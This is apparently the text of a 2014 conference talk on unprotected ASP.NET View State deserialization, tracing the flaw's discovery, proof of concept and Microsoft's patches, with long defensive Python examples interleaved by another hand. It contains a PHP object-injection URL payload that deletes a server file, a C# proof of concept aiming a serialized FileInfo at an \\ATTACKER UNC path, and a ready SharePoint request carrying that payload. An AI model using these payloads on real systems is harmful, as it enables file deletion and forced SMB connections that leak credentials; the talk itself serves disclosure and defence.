Application Security Forum - 2014 Western Switzerland 
05-06 November 2014 - Y-Parc / Yverdon-les-Bains 
http://www.appsec-forum.ch 
Why .NET needs MACs and other serial(-ization) tales 
Alexandre Herzog 
CTO / Compass Security Schweiz AG
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
2
About the tale 
It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. 
I won’t cover the disclosure process in detail 
•Not that I don’t want to, but I don’t have time for it 
•Feel free to come over and discuss this afterwards 
–Ideally over a glass of wine ;-) 
3
About its storyteller 
From Vaud, exiled first to Valais, then to Wellington (New Zealand) and now to Zurich 
Breaking stuff since 2010 for Compass Security 
•Previously worked for banks as sysadmin / developer 
Finished my MAS in Information Security in 2013 
•MAS thesis about “Crypto-based security mechanisms in Windows and .NET” 
Author of several security advisories 
•And still no Twitter handle (!) 
4
Once upon a time… 
September 2012, 
•during a standard ASP.NET web application assessment… 
<body> 
<form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> 
<div> 
<input type="hidden" […] value="" /> 
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> 
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> 
<input type="hidden" name="__VSTATE" id="__VSTATE" 
value="[LONG_BASE64_STRING]" /> 
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> 
</div> 
6
Once upon a time… 
// Custom View State persistence found in the assessed application 
protected override object LoadPageStateFromPersistenceMedium() { 
    string viewState = Request.Form["__VSTATE"]; 
    byte[] bytes = Convert.FromBase64String(viewState); 
    if (Helper.obterFlagCompressViewState()) 
        bytes = Compressor.Decompress(bytes); 
    LosFormatter formatter = new LosFormatter();   // default constructor: no MAC is checked 
    return formatter.Deserialize(Convert.ToBase64String(bytes)); 
} 

protected override void SavePageStateToPersistenceMedium(object viewState) { 
    LosFormatter formatter = new LosFormatter();   // default constructor: no MAC is appended 
    StringWriter writer = new StringWriter(); 
    formatter.Serialize(writer, viewState); 
    string viewStateString = writer.ToString(); 
    byte[] bytes = Convert.FromBase64String(viewStateString); 
    if (Helper.obterFlagCompressViewState()) 
        bytes = Compressor.Compress(bytes); 
    x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes));   // "x" as shown on the slide 
} 
8
Once upon a time… 
We have 
•A custom implementation of the __VIEWSTATE field 
•Its value is stored compressed within __VSTATE 
•It uses the default LosFormatter constructor (the LosFormatter(bool enableMac, string macKeyModifier) overload would have turned the MAC on) 
•No Machine Authentication (sic) Code (MAC) is used 
•The __VSTATE field sent to the client (the application’s replacement for __VIEWSTATE) is therefore not integrity-protected 
–Despite the fact that we serialize / deserialize objects from it… 
The same applies to regular ASP.NET pages 
•If the EnableViewStateMac property is disabled (it is enabled by default) 
10
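The custom __VSTATE persister above deserializes whatever the client returns. The fix the talk argues for, a MAC over the serialized state that is verified before anything is deserialized, as an added Python example (not code from the talk, and not ASP.NET's real View State MAC format, whose layout and keys come from <machineKey>): the "without MAC" functions mirror the pattern of the persister, the "with MAC" ones show the right order of operations, and demo() exercises the tampered, wrong-key and missing-MAC cases. The JSON state encoding, the payload || HMAC-SHA256 layout and the demo key are assumptions of the example.

```python
"""Integrity-protect serialized page state before handing it to the client.

Added Python example, not code from the talk and not ASP.NET's own View State
format. A state blob that travels through the client must carry a MAC, and the
MAC must be verified before any deserialization happens. The blob layout
(payload || HMAC-SHA256), the JSON encoding and the demo key are this example's
own choices.
"""
import base64
import hashlib
import hmac
import json

MAC_LEN = hashlib.sha256().digest_size   # 32 trailing bytes carry the MAC


class TamperedState(Exception):
    """The blob failed MAC verification (or carries no MAC at all)."""


def _encode(state):
    # Canonical JSON so that equal states always produce identical bytes
    return json.dumps(state, separators=(",", ":"), sort_keys=True).encode("utf-8")


def save_state_without_mac(state):
    """What the custom __VSTATE persister does: serialize, encode, trust the client."""
    return base64.b64encode(_encode(state)).decode("ascii")


def load_state_without_mac(blob):
    """Deserializes whatever the client sends back, with no integrity check."""
    return json.loads(base64.b64decode(blob))


def save_state(state, key):
    """Serialize, append HMAC-SHA256(key, payload), base64-encode the result."""
    payload = _encode(state)
    mac = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + mac).decode("ascii")


def load_state(blob, key):
    """Verify the MAC in constant time; deserialize only after it checks out."""
    raw = base64.b64decode(blob)
    if len(raw) <= MAC_LEN:
        raise TamperedState("blob too short to carry a MAC")
    payload, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise TamperedState("MAC mismatch")
    return json.loads(payload)


def tamper(blob, field, new_value, mac_len=0):
    """Client-side edit: the payload is plain base64, so anyone can read and change it.
    Any trailing MAC bytes are carried over unchanged (the attacker has no key)."""
    raw = base64.b64decode(blob)
    payload, trailer = (raw[:-mac_len], raw[-mac_len:]) if mac_len else (raw, b"")
    state = json.loads(payload)
    state[field] = new_value
    return base64.b64encode(_encode(state) + trailer).decode("ascii")


def demo(key=b"\x00" * 32):
    """Runs the cases side by side and returns their outcomes (the key is a demo constant)."""
    state = {"page": 3, "role": "user"}
    results = {}
    # 1. No MAC: a tampered role is accepted as-is
    plain = save_state_without_mac(state)
    results["unprotected_tampered_role"] = load_state_without_mac(
        tamper(plain, "role", "admin"))["role"]
    # 2. With MAC: the untouched blob round-trips
    protected = save_state(state, key)
    results["protected_roundtrip_ok"] = load_state(protected, key) == state
    # 3. With MAC: the same edit is rejected before json.loads is reached
    # 4./5. A blob produced under another key, or with no MAC at all, is rejected too
    for name, blob in (("protected_tamper_rejected", tamper(protected, "role", "admin", MAC_LEN)),
                       ("wrong_key_rejected", save_state(state, b"\x01" * 32)),
                       ("missing_mac_rejected", plain)):
        try:
            load_state(blob, key)
            results[name] = False
        except TamperedState:
            results[name] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Two details matter in load_state(): the comparison uses hmac.compare_digest so that a wrong MAC takes the same time as a right one, and json.loads() is only reached after the check. Note what the MAC does not give you: the payload is still readable by anyone holding the blob, so secrets in the state need encryption on top.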
Tales “Why does .NET need MACs” 
A View State contains 
•2 bytes of header data (ASP.NET 1.1 versus 2.0+) 
•A tree of serialized objects (View State bag & serialized ASP.NET controls of the page) 
•A (H)MAC ensuring integrity (if configured so – default: enabled) 
A View State 
•Can be encrypted 
•Can be split into several fields of at most x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields, controlled by MaxPageStateFieldLength) 
•Can include a user defined value so that the MAC is bound to e.g. the current session (Page.ViewStateUserKey property) 
12
Tales “Why does .NET need MACs” 
View State handling and lifecycle (diagram on the slide, summarised) 
•Request from the client comes in 
•ASP.NET deserializes the View State and copies the values back into the controls 
•The page runs; on the way out the control state is serialized into the View State again 
•Response is sent to the client 
Tales “Why does .NET need MACs” 
State of the art of hacking View States back then: 
Trustwave's SpiderLabs Security Advisory TWSL2010-001: 
Multiplatform View State Tampering Vulnerabilities 
Published: 2010-02-08 Version: 1.1 
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. 
Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 
14
Tales “Why does .NET need MACs” 
Inappropriate Microsoft advice back then (Trustwave): 
16
Tales “Why does .NET need MACs” 
State of the art of exploiting ASP.NET View State fields without MACs: 
•Abuse them for XSS 
•You must have an existing control on the page accepting HTML to inject your payload 
Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language 
•Implemented in their “Deface” tool 
•This attack was presented in MISC magazine #69 
17
Tales “Why does .NET need MACs” 
Back to September 2012: so ASP.NET unprotected View State fields can be misused 
•But “only” for XSS, and only when a few pre-conditions are met 
•And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) 
Some pages in e.g. SharePoint do not enforce a MAC on the View State 
•The View State on these pages is empty, so they can’t be misused for XSS 
18
“Serialization” tales 
Serialization is known to be an issue in web apps 
•Potentially user defined content gets deserialized on the server 
•Depends on the technology and the application’s code 
•Tool “Deface” targets Apache MyFaces 1.2.8 applications 
Let’s see a PHP example: 
20
“Serialization” tales 
class Example1 
{ 
    public $cache_file; 

    function __construct() 
    { 
        // some PHP code... 
    } 

    // Destructor: runs when the object is garbage-collected or the script ends, 
    // and deletes a path built from the attacker-controllable property cache_file 
    function __destruct() 
    { 
        $file = "/var/www/cache/tmp/{$this->cache_file}"; 
        if (file_exists($file)) @unlink($file); 
    } 
} 

// some PHP code... 
// unserialize() on user input instantiates any class the attacker names (PHP object injection) 
$user_data = unserialize($_GET['data']); 
// some PHP code... 
21
“Serialization” tales 
The flaw can be exploited with the following link 
•http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";} 
When receiving this request, the server 
•Takes GET parameter “data” and passes it to unserialize() 
•Instantiates an object of class “Example1” (the class name and the string lengths in the payload are attacker-chosen) 
•Assigns the value “../../index.php” to property “cache_file” 
•When the request ends and the object is destroyed, method “__destruct()” of “Example1” runs and deletes /var/www/cache/tmp/../../index.php, i.e. /var/www/index.php 
Can the same be done with .NET? 
22
“Serialization” tales 
Great research by James Forshaw (Context) 
Studying (and exploiting) .NET serialization via 
•IFormatter 
•XML Serialization 
•WCF Data Contracts 
•JSON 
But not a word about serialization of 
•The View State field 
•The LosFormatter object (limited object serialization) 
24
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object TempFileCollection deletes files in destructor 
[Serializable] 
public class TempFileCollection 
{ 
    private Hashtable files; // Deserialized list of files 
    // Other stuff... 

    ~TempFileCollection() 
    { 
        foreach (string file in files.Keys) 
        { 
            File.Delete(file); // Makes sure to delete them when the object is destroyed! 
        } 
    } 
} 
25
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object FileInfo triggers SMB requests 
[Serializable] 
public class FileInfo { 
    private string FullPath; 

    // Deserialization constructor: the path comes straight from the stream 
    protected FileInfo(SerializationInfo info, StreamingContext context) { 
        // Ensures path is canonical 
        FullPath = NormalizePath(info.GetString("FullPath")); 
    } 
} 

string NormalizePath(string path) { 
    string currPath = ""; 
    string[] parts = path.Split('\\'); 
    foreach (string part in parts) { 
        currPath += "\\" + part; 
        if (part[0] == '~') {          // If potential short (8.3) path, 
            GetLongPathName(currPath); // call the Windows API, which resolves a UNC path over the network 
        } 
    } 
    return currPath; 
} 
26
When the stories come together – My tale 
What if I combine the two things I now have 
•A View State field without integrity protection (i.e. no MAC) 
•Known .NET objects with interesting (de)serialization side effects 
If possible, I would be able to e.g. 
•Delete a file on the server 
•Get the server to initiate an SMB request to e.g. the attacker’s machine 
Can I apply it? 
Can it be done within the few hours left onsite? 
28
When the stories come together – My tale 
using System; using System.IO; using System.Text; using System.Web.UI; 
// created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 
public class ExploitViewstate 
{ 
    // Caution: both paths must have the same length, because the PoC patches the 
    // path inside the Base64 blob instead of re-serializing. 
    // UNC path; the '~' component makes FileInfo's NormalizePath call GetLongPathName 
    static String bogusFile = @"\\ATTACKER\~test\text.txt"; 
    static String dummyFile = @"c:\testCompass\testVS.txt"; 

    public static void Main(string[] args) { 
        String validViewstate = GenerateValidViewstate(); 
        Console.WriteLine("Valid viewstate: {0}", validViewstate); 
    } 

    // Serialize a FileInfo with the default (MAC-less) LosFormatter, the same 
    // way the target page deserializes its View State 
    private static String GenerateValidViewstate() { 
        FileInfo fi = new FileInfo(dummyFile); 
        LosFormatter los = new LosFormatter(); 
        using (StringWriter sw = new StringWriter()) { 
            los.Serialize(sw, fi); 
            return sw.ToString(); 
        } 
    } 
} 
29
When the stories come together – My tale 
C:\>set csc=c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 
C:\>%csc% exploitViewstate.cs && exploitViewstate.exe 
Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 
for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 
Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. 
Valid viewstate: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= 
For the PoC, we need to change the file in the above Base64 string from 
•c:\testCompass\testVS.txt 
to 
•\\ATTACKER\~test\text.txt 
(both are 25 characters long, so the path can be patched inside the serialized stream without touching its length fields) 
30
When the stories come together – My tale 
On an unpatched SharePoint, just send the following request: 
•http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 
31
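What is actually inside those blobs? The following is an added Python example (not code from the talk) that decodes a captured __VIEWSTATE value the way a tester or a defender would triage it offline: it reads the ObjectStateFormatter envelope (marker bytes 0xFF 0x01, then one type token) and, when the root token is Token_BinarySerialized (0x32), parses the start of the embedded BinaryFormatter stream far enough to report the root class, its member names and its string members. The two payloads from the slides are embedded as sample input; the PoC one yields a System.IO.FileInfo pointing at c:\testCompass\testVS.txt, the SharePoint request a UNC path, and in both cases no bytes follow the serialized object, which is what the MAC-less LosFormatter produces. Token and record numbers follow the ObjectStateFormatter source and the MS-NRBF specification; the "trailing bytes" reading (a classic ASP.NET 2.0 to 4.0 MAC is appended after the data, 20 bytes for SHA1) is the example's own heuristic.

```python
"""Triage a captured __VIEWSTATE value for an embedded BinaryFormatter object.

Added Python example, not code from the talk. Decodes the ObjectStateFormatter
envelope (0xFF 0x01 marker, then one type token) and, for Token_BinarySerialized
(0x32), parses the root class record of the embedded BinaryFormatter stream.
Token and record numbers follow ObjectStateFormatter and MS-NRBF. The two
payloads are copied from the talk (PoC tool output, SharePoint request).
"""
import base64
import struct
import urllib.parse

TOKEN_BINARY_SERIALIZED = 0x32

POC_VIEWSTATE = ("/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI"
                 "AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0"
                 "ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs=")
SHAREPOINT_VIEWSTATE = ("/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAM"
                        "T3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMu"
                        "dHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d")


def read_7bit_int(buf, pos):
    """.NET 7-bit encoded integer (BinaryWriter.Write7BitEncodedInt); returns (value, new_pos)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def read_lp_string(buf, pos):
    """MS-NRBF LengthPrefixedString: 7-bit length followed by UTF-8 bytes."""
    n, pos = read_7bit_int(buf, pos)
    return buf[pos:pos + n].decode("utf-8"), pos + n


def parse_binary_formatter(stream):
    """Return (class_name, member_names, string_values) of the stream's root class record."""
    if len(stream) < 18 or stream[0] != 0x00:
        raise ValueError("no SerializationHeaderRecord")
    pos = 17                      # record type, rootId, headerId, majorVersion, minorVersion
    record = stream[pos]
    pos += 1
    if record not in (0x04, 0x05):  # SystemClassWithMembersAndTypes / ClassWithMembersAndTypes
        raise ValueError("unsupported root record type 0x%02x" % record)
    pos += 4                      # objectId
    class_name, pos = read_lp_string(stream, pos)
    (count,) = struct.unpack_from("<i", stream, pos)
    pos += 4
    members = []
    for _ in range(count):
        name, pos = read_lp_string(stream, pos)
        members.append(name)
    type_enums = list(stream[pos:pos + count])
    pos += count
    for t in type_enums:          # AdditionalInfos exist only for some BinaryTypeEnum values
        if t in (0, 7):           # Primitive / PrimitiveArray: one PrimitiveTypeEnum byte
            pos += 1
        elif t == 3:              # SystemClass: type name
            _, pos = read_lp_string(stream, pos)
        elif t == 4:              # Class: type name + libraryId
            _, pos = read_lp_string(stream, pos)
            pos += 4
    if record == 0x05:
        pos += 4                  # libraryId of ClassWithMembersAndTypes
    values = []
    for t in type_enums:          # walk the leading String members only
        if t != 1:
            break
        rec = stream[pos]
        pos += 1
        if rec == 0x06:           # BinaryObjectString: objectId + LengthPrefixedString
            pos += 4
            s, pos = read_lp_string(stream, pos)
            values.append(s)
        elif rec == 0x0A:         # ObjectNull
            values.append(None)
        else:                     # MemberReference etc.: stop, the rest needs a full parser
            break
    return class_name, members, values


def inspect_viewstate(value):
    """Describe a __VIEWSTATE value (raw or URL-encoded base64) as a dict."""
    raw = base64.b64decode(urllib.parse.unquote(value))
    if raw[:2] != b"\xff\x01":
        return {"format": "unknown", "note": "no ObjectStateFormatter marker (encrypted, or not ASP.NET)"}
    token = raw[2]
    if token != TOKEN_BINARY_SERIALIZED:
        return {"format": "ObjectStateFormatter", "root_token": token, "binary_formatter": False}
    length, pos = read_7bit_int(raw, 3)
    cls, members, values = parse_binary_formatter(raw[pos:pos + length])
    return {"format": "ObjectStateFormatter", "root_token": token, "binary_formatter": True,
            "class": cls, "members": members, "values": values,
            "trailing_bytes": len(raw) - (pos + length)}   # bytes after the object; 0 = nothing appended


if __name__ == "__main__":
    for label, v in (("PoC", POC_VIEWSTATE), ("SharePoint request", SHAREPOINT_VIEWSTATE)):
        print(label, inspect_viewstate(v))
```

Any root token of 0x32 in a View State deserves attention, since it means a BinaryFormatter stream is deserialized on the server before the page ever casts the result (the log below shows exactly that cast failing after the FileInfo had already been constructed). The member walk stops at the first non-string value on purpose: a full MS-NRBF parser is out of scope here.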
When the stories come together – My tale 
In the SharePoint logs: 
09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) 
[…] 
09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5-6190-481e-8b21-c2cb5d04222b 
33
When the stories come together – My tale 
Demo! 
When the View State MAC is disabled, you can 
•Delete a file on the server (via object TempFileCollection) 
•Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) 
•I wasn’t able to get a generic remote code execution (so far) 
–Highly dependent on the application / content of the server’s GAC 
–But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 
34
Time sequence of the (patch) battle 
Disclosure milestones 
•26.09.2012 Initial contact with MSRC 
•19.02.2013 Microsoft aims for a fix in SharePoint in May 
•28.02.2013 Microsoft confirms work is under way for SkyDrive 
•15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC 
•03.07.2013 Patch again postponed (issues found during tests) 
•16.08.2013 Detailed answer about the next steps; BlueHat invitation 
•10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 
36
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•06.11.2013 Conference call with Microsoft 
•10.12.2013 December’s patch Tuesday with 
–MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) 
–MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) 
–KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) 
•11.12.2013 Meeting with several Microsoft people in Seattle 
37
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•05.05.2014 Release of ASP.NET 4.5.2, which ignores EnableViewStateMac="false", so the View State MAC can no longer be disabled 
•13.05.2014 May’s patch Tuesday with MS14-022 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) 
•07.08.2014 Announcement that support for .NET Framework 4, 4.5 and 4.5.1 ends in January 2016; only 4.5.2 and later remain supported 
•09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 
You are now safe… if you install all suggested Windows Update patches 
38
Time sequence of the (patch) battle 
But what was the content of 
•MS13-100 / CVE-2013-5059 
•MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) 
Microsoft did their homework 
•A cross-product/company wide effort was made to address serialisation / View State issues 
•Several additional attack vectors were found and fixed 
39
Time sequence of the (patch) battle 
Extract of MS13-100 (CVE-2013-5059) 
•New namespace “Microsoft.Office.Server.Security” 
•New internal class SafeSerialization with methods 
»IsSafeBinaryFormatterStreamWithAllowList([…]) […] 
»IsSafeBinaryFormatterStreamCommon( […]) 
•Usage within SharePoint: 
40
Is the ugly bug really dead? 
Yes if you patch adequately 
•No pages in SharePoint should be vulnerable 
•No pages in Outlook Web Access should be vulnerable 
•Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed 
This patch securing the Viewstate is controversial 
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” 
But how is the MAC computed? 
•Using the keys defined in <machineKey /> 
42
Is the ugly bug really dead? 
Result of an audit searching for static machineKey entries 
44
Is the ugly bug really dead? 
If I have your machineKey… 
•… I can generate a valid View State MAC too 
•Well, I can also generate a Forms Authentication cookie among other things… 
Issue was formally reported to Microsoft in August 2013 
•Microsoft took contact with the affected projects 
How do you manage your machineKeys? 
45
The (happy?) end 
Ensure your products are patched / unaffected 
•SharePoint (MS13-067, MS13-100 & MS14-022) 
•Exchange (OWA – MS13-105) 
•ASP.NET (KB2905247) 
•All your other third party ASP.NET sites 
If you don’t use ASP.NET 4.5.2 yet 
•Plan to support this version, as Microsoft will drop support for older versions in 2016 
47
The (happy?) end 
Verify your ASP.NET applications 
•Don’t deserialize untrusted documents (e.g. on file uploads) 
•Don’t re-implement custom View State-like features 
Ensure you manage your machineKeys correctly 
•If static keys are defined, manage them as carefully as all your other cryptographic material 
•No copy/paste from the Internet, dedicated keys per environment, … 
•Encrypt the sensitive sections of your web.config 
48
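In the spirit of the "audit searching for static machineKey entries" mentioned earlier and the three rules above, here is an added Python example (not the talk's tooling) that audits a set of web.config files offline: it reports hard-coded validationKey / decryptionKey values (anything that is not AutoGenerate), key material shared between configs (the copy/paste and one-key-for-all-environments cases), keys that are not hex of the documented minimum length, legacy validation / decryption algorithms, and sections it cannot read because they are already encrypted. The sample configs and every key value in them are constructed placeholders.

```python
"""Audit web.config files for static, shared or legacy <machineKey> settings.

Added Python example, not the talk's tooling. Parses web.config text with the
standard library and reports hard-coded keys, keys reused across configs,
keys that are not hex of the documented minimum length, legacy algorithms and
encrypted sections it cannot inspect. All sample configs and key values below
are constructed placeholders.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

LEGACY_VALIDATION = {"MD5", "SHA1", "3DES"}   # ASP.NET 4.x defaults to HMACSHA256
LEGACY_DECRYPTION = {"DES", "3DES"}
MIN_KEY_HEX_CHARS = 40                        # documented minimum for explicit keys (max 128)

# Constructed sample configs; the keys are obvious placeholders, never use them anywhere.
SAMPLE_CONFIGS = {
    "prod/web.config": """<configuration><system.web>
  <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
              decryptionKey="FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210"
              validation="SHA1" decryption="AES" />
</system.web></configuration>""",
    "staging/web.config": """<configuration><system.web>
  <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
              decryptionKey="CAFEBABE" validation="HMACSHA256" decryption="AES" />
</system.web></configuration>""",
    "dev/web.config": """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" />
</system.web></configuration>""",
    "intranet/web.config": """<configuration><system.web>
  <machineKey configProtectionProvider="DataProtectionConfigurationProvider">
    <EncryptedData>PLACEHOLDER</EncryptedData>
  </machineKey>
</system.web></configuration>""",
}


def machine_keys(config_xml):
    """Yield the attribute dict of every <machineKey> element (also those inside <location>)."""
    for elem in ET.fromstring(config_xml).iter("machineKey"):
        yield elem.attrib


def audit_machine_keys(configs):
    """configs: {config_name: web.config text}. Returns a sorted list of (config_name, finding)."""
    findings = []
    carriers = defaultdict(set)   # (attribute, key material) -> configs that carry it
    for name, text in configs.items():
        for attrs in machine_keys(text):
            if "configProtectionProvider" in attrs:
                findings.append((name, "machineKey section is encrypted (%s); not auditable offline"
                                 % attrs["configProtectionProvider"]))
                continue
            for attr in ("validationKey", "decryptionKey"):
                key = attrs.get(attr, "AutoGenerate,IsolateApps")   # the framework default
                if key.startswith("AutoGenerate"):
                    continue
                findings.append((name, "%s is hard-coded" % attr))
                if not re.fullmatch(r"[0-9A-Fa-f]{%d,}" % MIN_KEY_HEX_CHARS, key):
                    findings.append((name, "%s is not a hex string of at least %d characters"
                                     % (attr, MIN_KEY_HEX_CHARS)))
                carriers[(attr, key.upper())].add(name)
            if attrs.get("validation", "").upper() in LEGACY_VALIDATION:
                findings.append((name, "validation=%s is a legacy algorithm; use HMACSHA256 or stronger"
                                 % attrs["validation"]))
            if attrs.get("decryption", "").upper() in LEGACY_DECRYPTION:
                findings.append((name, "decryption=%s is a legacy algorithm; use AES" % attrs["decryption"]))
    for (attr, _), names in carriers.items():
        if len(names) > 1:         # the same key in several configs: shared or pasted
            for name in names:
                others = ", ".join(sorted(names - {name}))
                findings.append((name, "%s is shared with: %s" % (attr, others)))
    return sorted(findings)


if __name__ == "__main__":
    for config_name, finding in audit_machine_keys(SAMPLE_CONFIGS):
        print("%-20s %s" % (config_name, finding))
```

Point the loader at real files by replacing SAMPLE_CONFIGS with a dict read from disk. An AutoGenerate key is not a finding (it only stops working across a web farm), and an already encrypted section is reported rather than skipped silently, since that is the state the last bullet asks for (aspnet_regiis.exe -pe "system.web/machineKey" -app "/YourApp" produces it).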
Questions? 
49
Merci/Thank you! 
Contact: 
alexandre.herzog@csnc.ch 
Blog http://blog.csnc.ch/ 
LinkedIn http://ch.linkedin.com/in/alexandreherzog/ 
G+ https://plus.google.com/u/1/109572456864701444940/ 
Slides: 
http://slideshare.net/ASF-WS/presentations 
http://appsec-forum.ch 
50
References 
Understanding ASP.NET View State – http://msdn.microsoft.com/en-us/library/ms972976.aspx 
David Byrne, Beware of Serialized GUI Objects Bearing Data (Black Hat DC 2010) – https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf 
OWASP – PHP Object Injection – https://www.owasp.org/index.php/PHP_Object_Injection 
James Forshaw, Are You My Type? (Black Hat USA 2012) – https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf 
Barry Dorrans – Going beyond OWASP (esp. 36:40 to 46:45) – http://vimeo.com/108438465 
Moving to the .NET Framework 4.5.2 – http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net-framework-4-5-2.aspx 
Farewell, EnableViewStateMac! – http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell-enableviewstatemac.aspx 
51

The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
GWT Web Socket and data serialization
GWT Web Socket and data serializationGWT Web Socket and data serialization
GWT Web Socket and data serialization
 
Adventures in Multithreaded Core Data
Adventures in Multithreaded Core DataAdventures in Multithreaded Core Data
Adventures in Multithreaded Core Data
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Azure and Umbraco CMS
Azure and Umbraco CMSAzure and Umbraco CMS
Azure and Umbraco CMS
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the Web
 
Multi Client Development with Spring
Multi Client Development with SpringMulti Client Development with Spring
Multi Client Development with Spring
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and more
 
Web app and more
Web app and moreWeb app and more
Web app and more
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC
 

Plus de Cyber Security Alliance

Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
iOS malware: what's the risk and how to reduce it
